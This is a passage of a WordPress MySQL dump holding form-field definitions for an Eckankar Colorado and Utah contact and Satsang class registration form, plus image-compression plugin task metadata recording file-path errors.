here:','if_you_have_a_message_please_enter_it_here_1649199448265','textarea',56,'2022-04-05 22:57:36',NULL,'If you have a message, please enter it here:','if_you_have_a_message_please_enter_it_here_1649199448265',6,0x00,'','above',0x00),(536,'Text','html_305','html',56,'2022-04-05 21:40:44',NULL,'Text','html_305',7,0x00,'Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','',0x00),(537,'Confirm that you are not a bot','recaptcha_277','recaptcha',56,'2022-04-05 21:40:44',NULL,'Confirm that you are not a bot','recaptcha_277',8,0x01,'','left',0x00),(538,'Submit','submit_278','submit',56,'2022-04-05 21:40:44',NULL,'Submit','submit_278',9,0x00,'','',0x00),(599,'Text','html_267','html',60,'2022-09-21 06:27:15',NULL,'Text','html_267',1,0x00,'<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\n\nPlease Enter Your Information Below','',0x00),(600,'First Name','textbox_268','textbox',60,'2022-09-21 06:27:15',NULL,'First Name','textbox_268',2,0x01,'','above',0x00),(601,'Last Name','lastname_269','lastname',60,'2022-09-21 06:27:15',NULL,'Last Name','lastname_269',3,0x01,'','above',0x01),(602,'Email','email_270','email',60,'2022-09-21 06:27:15',NULL,'Email','email_270',4,0x01,'','above',0x01),(603,'hr','hr_273','hr',60,'2022-09-21 06:27:15',NULL,'hr','hr_273',5,0x00,'','',0x00),(604,'Message Subject','textbox_303','textbox',60,'2022-09-21 06:27:15',NULL,'Message Subject','textbox_303',6,0x01,'','above',0x00),(605,'Enter Your Message Here','textarea_276','textarea',60,'2022-09-21 06:27:15',NULL,'Enter Your Message Here','textarea_276',7,0x01,'','above',0x00),(606,'Text','html_305','html',60,'2022-09-21 06:27:15',NULL,'Text','html_305',8,0x00,'Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','',0x00),(608,'Submit','submit_278','submit',60,'2022-09-21 06:27:15',NULL,'Submit','submit_278',10,0x00,'','',0x00),(609,'HTML','html_1663797373767','html',2,'2022-09-21 21:56:36',NULL,'HTML','html_1663797373767',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(610,'HTML','html_1663797370980','html',2,'2022-09-21 21:56:36',NULL,'HTML','html_1663797370980',11,0x00,'','',0x00),(611,'HTML','html_1663797502959','html',4,'2022-09-21 21:58:43',NULL,'HTML','html_1663797502959',12,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(612,'HTML','html_1663797542883','html',53,'2022-09-21 21:59:16',NULL,'HTML','html_1663797542883',12,0x00,'This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(613,'HTML','html_1663797539003','html',53,'2022-09-21 21:59:16',NULL,'HTML','html_1663797539003',14,0x00,'','',0x00),(614,'HTML','html_1663797572453','html',5,'2022-09-21 21:59:47',NULL,'HTML','html_1663797572453',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(615,'HTML','html_1663797570022','html',5,'2022-09-21 21:59:47',NULL,'HTML','html_1663797570022',11,0x00,'','',0x00),(616,'HTML','html_1663797605970','html',6,'2022-09-21 22:00:27',NULL,'HTML','html_1663797605970',9,0x00,'This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(617,'HTML','html_1663797718830','html',32,'2022-09-21 22:02:12',NULL,'HTML','html_1663797718830',9,0x00,'This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(618,'HTML','html_1663797717432','html',32,'2022-09-21 22:02:12',NULL,'HTML','html_1663797717432',11,0x00,'','',0x00),(619,'HTML','html_1663797745321','html',8,'2022-09-21 22:02:40',NULL,'HTML','html_1663797745321',11,0x00,'This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(620,'HTML','html_1663797774442','html',9,'2022-09-21 22:03:18',NULL,'HTML','html_1663797774442',17,0x00,'This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(621,'HTML','html_1663797801429','html',10,'2022-09-21 22:03:37',NULL,'HTML','html_1663797801429',11,0x00,'This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(622,'HTML','html_1663797799791','html',10,'2022-09-21 22:03:37',NULL,'HTML','html_1663797799791',13,0x00,'','',0x00),(623,'HTML','html_1663797829803','html',35,'2022-09-21 22:05:28',NULL,'HTML','html_1663797829803',8,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(624,'HTML','html_1663798083380','html',13,'2022-09-21 22:08:26',NULL,'HTML','html_1663798083380',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(625,'HTML','html_1663798119504','html',14,'2022-09-21 22:08:57',NULL,'HTML','html_1663798119504',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(626,'HTML','html_1663798148731','html',15,'2022-09-21 22:09:22',NULL,'HTML','html_1663798148731',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(627,'HTML','html_1663800425943','html',49,'2022-09-21 22:47:21',NULL,'HTML','html_1663800425943',8,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(628,'HTML','html_1663800453785','html',16,'2022-09-21 22:47:52',NULL,'HTML','html_1663800453785',11,0x00,'This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(629,'HTML','html_1663800483443','html',17,'2022-09-21 22:48:27',NULL,'HTML','html_1663800483443',8,0x00,'This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(630,'HTML','html_1663800517759','html',18,'2022-09-21 22:49:10',NULL,'HTML','html_1663800517759',11,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(631,'HTML','html_1663800560932','html',39,'2022-09-21 22:49:36',NULL,'HTML','html_1663800560932',8,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(632,'HTML','html_1663800586504','html',19,'2022-09-21 22:49:59',NULL,'HTML','html_1663800586504',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(633,'HTML','html_1663800583849','html',19,'2022-09-21 22:49:59',NULL,'HTML','html_1663800583849',11,0x00,'','',0x00),(634,'HTML','html_1663800618371','html',20,'2022-09-21 22:50:32',NULL,'HTML','html_1663800618371',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(635,'HTML','html_1663800642906','html',21,'2022-09-21 22:51:02',NULL,'HTML','html_1663800642906',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(636,'HTML','html_1663800683276','html',22,'2022-09-21 22:51:36',NULL,'HTML','html_1663800683276',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(637,'HTML','html_1663800713464','html',23,'2022-09-21 22:52:07',NULL,'HTML','html_1663800713464',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(638,'HTML','html_1663800740469','html',24,'2022-09-21 22:52:34',NULL,'HTML','html_1663800740469',17,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(639,'HTML','html_1663800773041','html',25,'2022-09-21 22:53:09',NULL,'HTML','html_1663800773041',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(640,'HTML','html_1663800814752','html',34,'2022-09-21 22:53:47',NULL,'HTML','html_1663800814752',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(641,'HTML','html_1663801397261','html',12,'2022-09-21 23:03:31',NULL,'HTML','html_1663801397261',11,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(642,'HTML','html_1663801395614','html',12,'2022-09-21 23:03:31',NULL,'HTML','html_1663801395614',13,0x00,'','',0x00),(643,'HTML','html_1663801551902','html',11,'2022-09-21 23:06:10',NULL,'HTML','html_1663801551902',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(644,'HTML','html_1663801548990','html',11,'2022-09-21 23:06:10',NULL,'HTML','html_1663801548990',11,0x00,'','',0x00),(645,'Satsang Class Registration','satsang_class_registration_1632437126898','html',61,'2023-09-06 20:19:43',NULL,'Satsang Class Registration','satsang_class_registration_1632437126898',3,0x00,'<p style=\"font-size:18px; font-weight: 600;\" align=\"center\">Please fill in your details in the \'Satsang Class Registration\' form below and you will be automatically registered.</p>','',0x00),(646,'Divider','hr_1639606449220','hr',61,'2023-02-01 16:31:40',NULL,'Divider','hr_1639606449220',2,0x00,'','',0x00),(647,'Divider','hr_2','hr',61,'2023-09-05 16:43:54',NULL,'Divider','hr_2',13,0x00,'','',0x00),(648,'HTML','html','html',61,'2023-09-05 16:43:54',NULL,'HTML','html',14,0x00,'<p><i>We take your                                                privacy very seriously                                                and will never share                                                your personal                                                information with anyone.                                                Any personal information                                                provided to us will be                                                used only to respond or                                                to service the request                                                or inquiry made</i></p><p><i><b>** For in-person classes</b> -- Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </i><i><br></i></p>','',0x00),(649,'Enter Message for Arahata (Optional)','enter_message_for_arahata_optional_1599679737041','textarea',61,'2023-09-05 16:43:54',NULL,'Enter Message for Arahata (Optional)','enter_message_for_arahata_optional_1599679737041',12,0x00,'','default',0x00),(651,'<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498','textbox',61,'2023-09-05 16:44:37',NULL,'<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498',7,0x01,'','default',0x00),(652,'<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625','lastname',61,'2023-09-05 16:44:37',NULL,'<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625',5,0x01,'','default',0x01),(653,'<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837','email',61,'2023-09-05 16:44:37',NULL,'<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837',6,0x01,'','default',0x01),(654,'<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711','firstname',61,'2023-09-05 16:44:37',NULL,'<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711',4,0x01,'','default',0x01),(655,'Register','register','submit',61,'2023-02-01 16:31:40',NULL,'Register','register',15,0x00,'','',0x00),(656,'Select One Class Per Registrant','select_one_class_per_registrant_1658696832524','listradio',61,'2023-09-05 16:43:54',NULL,'Select One Class Per Registrant','select_one_class_per_registrant_1658696832524',11,0x01,'','default',0x00),(657,'HTML','html_1632671894259','html',61,'2023-09-11 06:32:45',NULL,'HTML','html_1632671894259',1,0x00,'<p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 33px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">2023-2024<br>Colorado &amp; Utah</p><p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 43px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">ECK Satsang Class Registration</p><div style=\"line-height: 150%;padding-top: 16px;\"><div align=\"center\"><span style=\"font-size: 24px; line-height: 150%; color:#b8860b !important;\"><strong>This form is only for residents of Colorado and Utah. </strong></span><br><span style=\"font-size: 24px; line-height: 150%;\"><strong></strong></span></div><span style=\"font-size: 20px; line-height: 150%;\"><br></span></div><div style=\"line-height: 150%;font-size: 20px;color: #333333; background-color: #eaf7ff; padding: 10px; border: 1px solid #d7d7d7; box-shadow: rgba(0, 0, 0, 0.16) 0px 3px 6px, rgba(0, 0, 0, 0.23) 0px 3px 6px;\" align=\"center\"><b>NOTE: </b>Satsang Class registration must be completed by the 3rd class meeting.<br>After this date, registrations will no longer be accepted.<span style=\"font-size: 20px; line-height: 150%;\"><br></span></div>','',0x00),(658,'ECK Member Classes Available for 2023-2024','eck_member_classes_available_for_2023-2024_1693928528054','html',61,'2023-09-06 20:36:31',NULL,'ECK Member Classes Available for 2023-2024','eck_member_classes_available_for_2023-2024_1693928528054',9,0x00,'<div style=\"font-size: 20px;color: #333333; background-color: #f3f2f2; padding: 10px; border: 1px solid #d7d7d7;line-height: 95%;\"><p class=\"\" style=\"font-family: Open Sans; font-size: 20px; text-transform: none; color: rgb(29, 87, 145); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><b>Classes are open to all Chelas residing within Colorado and Utah. Available class formats include:</b></p><ul><li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">In Person Classes<br></span></li><li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Zoom Classes<br></span></li>  <li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Hybrid Classes  <span style=\"font-size:19px\">(<i>Hybrid events combine in person and online attendance</i></span>)</span><br><em></em></li></ul></div>','',0x00),(660,'First Name','textbox_142','textbox',62,'2023-07-04 16:22:26',NULL,'First Name','textbox_142',2,0x01,'','above',0x00),(661,'Last Name','lastname_143','lastname',62,'2023-07-04 16:22:26',NULL,'Last Name','lastname_143',3,0x01,'','above',0x01),(662,'Email','email_144','email',62,'2023-07-04 16:22:26',NULL,'Email','email_144',4,0x01,'','above',0x01),(663,'Phone','phone_145','phone',62,'2023-07-04 16:22:26',NULL,'Phone','phone_145',5,0x01,'','above',0x01),(664,'Your Local Area','listselect_146','listselect',62,'2023-07-04 16:22:26',NULL,'Your Local Area','listselect_146',6,0x01,'','above',0x00),(665,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166666321','listselect',62,'2023-07-04 16:22:26',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166666321',7,0x01,'','above',0x00),(666,'Enter Your Message Here','textarea_150','textarea',62,'2023-07-04 16:22:26',NULL,'Enter Your Message Here','textarea_150',8,0x01,'','above',0x00),(667,'Submit','submit_152','submit',62,'2023-07-04 16:22:26',NULL,'Submit','submit_152',10,0x00,'','',0x00),(668,'HTML','html_1663797373767','html',62,'2023-07-04 16:22:26',NULL,'HTML','html_1663797373767',9,0x00,'This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','',0x00),(669,'HTML','html_1663797370980','html',62,'2023-07-04 16:22:26',NULL,'HTML','html_1663797370980',11,0x00,'','',0x00),(670,'Satsang Class Registration','satsang_class_registration_1632437126898','html',63,'2023-09-05 15:39:18',NULL,'Satsang Class Registration','satsang_class_registration_1632437126898',3,0x00,'<p style=\"font-size:18px;\" align=\"center\">Please fill in your details in the \'Satsang Class Registration\' form below and you will be automatically registered.</p>\n','',0x00),(671,'Divider','hr_1639606449220','hr',63,'2023-09-05 15:39:18',NULL,'Divider','hr_1639606449220',2,0x00,'','',0x00),(672,'Divider','hr_2','hr',63,'2023-09-05 15:39:18',NULL,'Divider','hr_2',12,0x00,'','',0x00),(673,'HTML','html','html',63,'2023-09-05 15:46:07',NULL,'HTML','html',13,0x00,'<p><i>We take your                                                privacy very seriously                                                and will never share                                                your personal                                                information with anyone.                                                Any personal information                                                provided to us will be                                                used only to respond or                                                to service the request                                                or inquiry made</i></p><p><i><b>** For in-person classes</b> -- Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </i><i><br></i></p>','',0x00),(674,'Enter Message for Arahata (Optional)','enter_message_for_arahata_optional_1599679737041','textarea',63,'2023-09-05 15:39:18',NULL,'Enter Message for Arahata (Optional)','enter_message_for_arahata_optional_1599679737041',11,0x00,'','default',0x00),(675,'Divider','hr_1','hr',63,'2023-09-05 15:39:18',NULL,'Divider','hr_1',8,0x00,'','',0x00),(676,'<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498','textbox',63,'2023-09-05 15:39:18',NULL,'<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498',7,0x01,'','default',0x00),(677,'<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625','lastname',63,'2023-09-05 15:39:18',NULL,'<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625',5,0x01,'','default',0x01),(678,'<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837','email',63,'2023-09-05 15:39:18',NULL,'<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837',6,0x01,'','default',0x01),(679,'<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711','firstname',63,'2023-09-05 15:39:18',NULL,'<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711',4,0x01,'','default',0x01),(680,'Register','register','submit',63,'2023-09-05 15:39:18',NULL,'Register','register',15,0x00,'','',0x00),(681,'Select One Class Per Registrant','select_one_class_per_registrant_1658696832524','listradio',63,'2023-09-05 15:39:18',NULL,'Select One Class Per Registrant','select_one_class_per_registrant_1658696832524',10,0x01,'','default',0x00),(682,'HTML','html_1632671894259','html',63,'2023-09-05 15:46:07',NULL,'HTML','html_1632671894259',1,0x00,'<p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 33px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">2023-2024<br>Colorado &amp; Utah</p><p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 43px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">ECK Satsang Class Registration</p><div style=\"line-height: 150%;padding-top: 16px;\"><div align=\"center\"><span style=\"font-size: 24px; line-height: 150%; color:#b8860b !important;\"><strong>This form is only for residents of Colorado and Utah. </strong></span><br><span style=\"font-size: 24px; line-height: 150%;\"><strong></strong></span></div><span style=\"font-size: 20px; line-height: 150%;\"><br></span></div><div style=\"line-height: 150%;font-size: 20px;color: #333333; background-color: #efefef; padding: 10px; border: 1px solid #d7d7d7;\" align=\"center\"><b>NOTE: </b>Satsang Class registration must be completed by the 3rd class meeting.<br>After this date, registrations will no longer be accepted.<span style=\"font-size: 20px; line-height: 150%;\"><br></span></div>','',0x00),(683,'ECK Member Classes Available for 2023-2024','eck_member_classes_available_for_2023-2024_1693928749137','html',63,'2023-09-05 15:46:07',NULL,'ECK Member Classes Available for 2023-2024','eck_member_classes_available_for_2023-2024_1693928749137',9,0x00,'<div style=\"font-size: 20px;color: #333333; background-color: #efefef; padding: 10px; border: 1px solid #d7d7d7;line-height: 95%;\"><p class=\"\" style=\"font-family: Open Sans; font-size: 20px; text-transform: none; color: rgb(29, 87, 145); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><b>Classes are open to all Chelas residing within Colorado and Utah. Available class formats include:</b></p>\n<ul>\n<li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">In Person Classes<br></span></li>\n<li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Zoom Classes<br></span></li>\n  <li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Hybrid Classes  <span style=\"font-size:19px\">(<i>Hybrid events combine in person and online attendance</i></span>)</span><br><em></em></li>\n</ul>\n</div>','',0x00);
/*!40000 ALTER TABLE `wpcl_nf3_fields` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_nf3_fields` with 477 row(s)
--

--
-- Table structure for table `wpcl_tm_taskmeta`
--

DROP TABLE IF EXISTS `wpcl_tm_taskmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_tm_taskmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `task_id` bigint(20) NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `task_id` (`task_id`)
) ENGINE=MyISAM AUTO_INCREMENT=972 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_tm_taskmeta`
--

LOCK TABLES `wpcl_tm_taskmeta` WRITE;
/*!40000 ALTER TABLE `wpcl_tm_taskmeta` DISABLE KEYS */;
INSERT INTO `wpcl_tm_taskmeta` VALUES (950,950,'task_options','a:15:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";s:0:\"\";s:13:\"image_quality\";s:3:\"100\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:269263;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:0:\"\";s:13:\"current_stage\";s:11:\"initialised\";s:10:\"error_code\";s:17:\"invalid_file_path\";s:13:\"error_message\";s:56:\"The linked attachment ID does not have a valid file path\";}'),(934,934,'task_options','a:15:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";s:0:\"\";s:13:\"image_quality\";s:3:\"100\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:269011;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:0:\"\";s:13:\"current_stage\";s:11:\"initialised\";s:10:\"error_code\";s:17:\"invalid_file_path\";s:13:\"error_message\";s:56:\"The linked attachment ID does not have a valid file path\";}'),(928,928,'task_options','a:15:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";s:0:\"\";s:13:\"image_quality\";s:3:\"100\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:268992;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:0:\"\";s:13:\"current_stage\";s:11:\"initialised\";s:10:\"error_code\";s:17:\"invalid_file_path\";s:13:\"error_message\";s:56:\"The linked attachment ID does not have a valid file path\";}'),(929,929,'task_options','a:15:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";s:0:\"\";s:13:\"image_quality\";s:3:\"100\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:268994;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:0:\"\";s:13:\"current_stage\";s:11:\"initialised\";s:10:\"error_code\";s:17:\"invalid_file_path\";s:13:\"error_message\";s:56:\"The linked attachment ID does not have a valid file 